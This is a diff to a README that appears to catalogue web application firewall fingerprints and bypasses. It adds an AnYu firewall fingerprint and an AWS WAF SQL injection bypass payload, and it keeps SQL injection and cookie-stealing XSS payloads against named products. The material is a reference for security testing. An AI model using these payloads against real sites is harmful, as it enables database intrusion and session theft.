diff --git a/README.md b/README.md
index fe58830..27d116f 100644
--- a/README.md
+++ b/README.md
@@ -194,6 +194,22 @@ Wanna fingerprint WAFs? Lets see how.
+
+
+ Anyu Firewall
+ |
+
+
+ - Detectability: Easy
+ - Detection Methodology:
+
+ - Blocked response content contains
Sorry! your access has been intercepted by AnYu
+ - Blocked response page contains
AnYu- the green channel text.
+ - Response headers may contain unusual header
WZWS-RAY .
+
+
+ |
+
Application Security Manager (F5 Networks)
@@ -2452,6 +2468,12 @@ Before anything else, you should hone up skills from [Google Dorks Cheat Sheet](
%C0%80'+union+select+col1,col2,col3+from+table+--+
```
+### AWS
+- [SQLi Bypass](https://github.com/enkaskal/aws-waf-sqli-bypass-PoC) by [@enkaskal](https://twitter.com/enkaskal)
+```
+"; select * from TARGET_TABLE --
+```
+
### Barracuda
- Cross Site Scripting by [@WAFNinja](https://waf.ninja)
```
@@ -2502,12 +2524,17 @@ http://host/index.php/wp-json/wp/v2/users/
```
-- `generic_api_call.pl` XSS by [@NNPoster](https://www.exploit-db.com/?author=6654)
+- [`generic_api_call.pl` XSS](https://www.exploit-db.com/exploits/30777) by [@NNPoster](https://www.exploit-db.com/?author=6654)
```
http://host/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e
```
### Cloudflare
+- XSS Bypass by [@RakeshMane10](https://twitter.com/rakeshmane10)
+```
+ |